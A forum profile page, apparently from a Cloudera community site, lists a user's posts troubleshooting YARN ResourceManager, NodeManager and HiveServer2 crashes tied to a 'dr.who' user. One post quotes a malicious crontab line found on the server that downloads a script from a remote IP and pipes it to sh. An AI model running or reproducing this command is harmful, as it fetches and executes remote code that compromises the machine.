Member since
06-24-2018
59
Posts
8
Kudos Received
4
Solutions
My Accepted Solutions
Title | Views | Posted |
---|---|---|
9599 | 01-12-2019 05:48 AM | |
17046 | 08-26-2018 10:41 AM | |
6859 | 08-13-2018 05:39 AM | |
5641 | 08-06-2018 07:45 AM |
08-15-2018
11:51 PM
Can you please share logs ? plus share screen of that particular hosts. Thanks
... View more
08-14-2018
11:13 PM
Hello, Alright guys, i am facing the same issue and after running crontab command i found
***** wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&1 But i am not able to find any running java process may be because my resource manager has exited and it is not operational anymore. Beside i did find a java app in /var/tmp folder, so supposedly i should delete it right ? Second thing my resource manager provides an warning exits "Dr.who has been converted for dr_dot_who" and it cause it to shut down. Just to clear my confusion, i struggled around one week on this still no result and the main point of suspicion was why yarn is running application, beside i didn't not schedule any queue am i right ? or it runs by own ? Thanks, please reply ASAP
... View more
08-13-2018
05:39 AM
issue solved !
... View more
08-09-2018
03:37 AM
can you please help me here ? what solution did you adopt ? I have just recently started using it
... View more
08-08-2018
05:02 AM
Hello, Resource manager is giving warning and exiting " Name dr.who is converted to dr_dot_who when it is used as a queue name." any possible solution ? complete log for warnings is below 3:08:49.689 PM WARN QueuePlacementRule Name dr.who is converted to dr_dot_who when it is used as a queue name. 3:08:49.689 PM INFO FairScheduler Accepted application application_1533729822715_0025 from user: dr.who, in queue: root.users.dr_dot_who, currently num of applications: 21 3:08:49.690 PM INFO RMAppImpl application_1533729822715_0025 State change from SUBMITTED to ACCEPTED on event = APP_ACCEPTED 3:08:49.690 PM INFO ApplicationMasterService Registering app attempt : appattempt_1533729822715_0025_000001 3:08:49.690 PM INFO RMAppAttemptImpl appattempt_1533729822715_0025_000001 State change from NEW to SUBMITTED on event = START 3:08:49.690 PM INFO FairScheduler Added Application Attempt appattempt_1533729822715_0025_000001 to scheduler from user: dr.who 3:08:49.691 PM INFO RMAppAttemptImpl appattempt_1533729822715_0025_000001 State change from SUBMITTED to SCHEDULED on event = ATTEMPT_ADDED 3:08:50.820 PM WARN RMAppImpl The specific max attempts: 3 for application: 7 is invalid, because it is out of the range [1, 2]. Use the global max attempts instead. 3:08:50.820 PM INFO ClientRMService Application with id 7 submitted by user dr.who 3:08:50.820 PM INFO RMAuditLogger USER=dr.who OPERATION=Submit Application Request TARGET=ClientRMService RESULT=SUCCESS APPID=application_1533729822715_0007 3:08:50.821 PM INFO RMAppImpl Storing application with id application_1533729822715_0007 3:08:50.822 PM INFO RMAppImpl application_1533729822715_0007 State change from NEW to NEW_SAVING on event = START 3:08:50.822 PM INFO RMStateStore Storing info for app: application_1533729822715_0007 3:08:50.822 PM INFO RMAppImpl application_1533729822715_0007 State change from NEW_SAVING to SUBMITTED on event = APP_NEW_SAVED 3:08:50.822 PM WARN QueuePlacementRule Name dr.who is converted to dr_dot_who when it is used as a queue name.
... View more
Labels:
- Labels:
-
Apache YARN
-
Cloudera Navigator
-
MapReduce
08-06-2018
01:12 PM
Hello, Ok, so i had Node manager running completly fine and suprisingly it started to crash and exited every few minutes. For instance its exited at x time and minutes, after 10-15 minutes it will be back again. I looked up to host logs and Node manager logs specifically, i found following message related to "stop instruction by container for application xxxx" 2018-08-06 23:10:09,842 INFO org.apache.hadoop.yarn.server.nodemanager.containermanager.monitor.ContainersMonitorImpl: Memory usage of ProcessTree 3048 for container-id container_1533576341741_0986_01_000001: -1B of 1 GB physical memory used; -1B of 2.1 GB virtual memory used 2018-08-06 23:10:10,178 ERROR org.apache.hadoop.yarn.server.nodemanager.containermanager.launcher.RecoveredContainerLaunch: Unable to recover container container_1533576341741_0986_01_000001 java.io.IOException: Timeout while waiting for exit code from container_1533576341741_0986_01_000001 at org.apache.hadoop.yarn.server.nodemanager.ContainerExecutor.reacquireContainer(ContainerExecutor.java:199) at org.apache.hadoop.yarn.server.nodemanager.containermanager.launcher.RecoveredContainerLaunch.call(RecoveredContainerLaunch.java:83) at org.apache.hadoop.yarn.server.nodemanager.containermanager.launcher.RecoveredContainerLaunch.call(RecoveredContainerLaunch.java:46) at java.util.concurrent.FutureTask.run(FutureTask.java:262) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615) at java.lang.Thread.run(Thread.java:745) 2018-08-06 23:10:10,186 WARN org.apache.hadoop.yarn.server.nodemanager.containermanager.launcher.RecoveredContainerLaunch: Recovered container exited with a non-zero exit code 154 2018-08-06 23:10:10,191 INFO org.apache.hadoop.yarn.server.nodemanager.containermanager.container.Container: Container container_1533576341741_0986_01_000001 transitioned from RUNNING to EXITED_WITH_FAILURE 2018-08-06 23:10:10,191 INFO org.apache.hadoop.yarn.server.nodemanager.containermanager.launcher.ContainerLaunch: Cleaning up container container_1533576341741_0986_01_000001 2018-08-06 23:10:10,259 INFO org.apache.hadoop.yarn.server.nodemanager.DefaultContainerExecutor: Deleting absolute path : /yarn/nm/usercache/dr.who/appcache/application_1533576341741_0986/container_1533576341741_0986_01_000001 2018-08-06 23:10:10,270 WARN org.apache.hadoop.yarn.server.nodemanager.NMAuditLogger: USER=dr.who OPERATION=Container Finished - Failed TARGET=ContainerImpl RESULT=FAILURE DESCRIPTION=Container failed with state: EXITED_WITH_FAILURE APPID=application_1533576341741_0986 CONTAINERID=container_1533576341741_0986_01_000001 2018-08-06 23:10:10,278 INFO org.apache.hadoop.yarn.server.nodemanager.containermanager.container.Container: Container container_1533576341741_0986_01_000001 transitioned from EXITED_WITH_FAILURE to DONE 2018-08-06 23:10:10,279 INFO org.apache.hadoop.yarn.server.nodemanager.containermanager.application.Application: Removing container_1533576341741_0986_01_000001 from application application_1533576341741_0986 2018-08-06 23:10:10,280 INFO org.apache.hadoop.yarn.server.nodemanager.containermanager.logaggregation.AppLogAggregatorImpl: Considering container container_1533576341741_0986_01_000001 for log-aggregation 2018-08-06 23:10:10,280 INFO org.apache.hadoop.yarn.server.nodemanager.containermanager.AuxServices: Got event CONTAINER_STOP for appId application_1533576341741_0986 2018-08-06 23:10:11,287 INFO org.apache.hadoop.yarn.server.nodemanager.NodeStatusUpdaterImpl: Removed completed containers from NM context: [container_1533576341741_0986_01_000001] 2018-08-06 23:10:12,843 INFO org.apache.hadoop.yarn.server.nodemanager.containermanager.monitor.ContainersMonitorImpl: Stopping resource-monitoring for container_1533576341741_0986_01_000001 Any one faced similar issue ? or can help me solve it ? Thanks
... View more
Labels:
- Labels:
-
Apache YARN
-
Cloudera Manager
08-06-2018
09:23 AM
+ [[ -f /run/cloudera-scm-agent/process/527-hive-HIVESERVER2/ ]] + exec /opt/cloudera/parcels/CDH-5.15.0-1.cdh5.15.0.p0.21/lib/hive/bin/hive --config /run/cloudera-scm-agent/process/527-hive-HIVESERVER2 --service hiveserver2 18/08/06 19:19:40 WARN conf.HiveConf: HiveConf of name hive.server2.idle.session.timeout_check_operation does not exist 18/08/06 19:19:40 WARN conf.HiveConf: HiveConf of name hive.entity.capture.input.URI does not exist this is what i got from recent stderr and this from role log Error starting HiveServer2: could not start ThriftBinaryCLIService
org.apache.thrift.transport.TTransportException: Could not create ServerSocket on address 0.0.0.0/0.0.0.0:10000.
... View more
08-06-2018
09:10 AM
I almost have tried everything , i am not sure what is causing this problem. the problem is with unexpected exits tcp 0 0 0.0.0.0:10002 0.0.0.0:* LISTEN 22735/java port is free now, when it unexpectedly exit
... View more
08-06-2018
09:07 AM
ok, 87.92.98.123 --> this here is my router's default configuration page, surprisingly. No error occurs while starting or stopping hiveserver2 or hive. It will start correctly and then after few minutes will be pulled down. I verified 22735, it is hive but not specifically hiveserver2
... View more
- « Previous
- Next »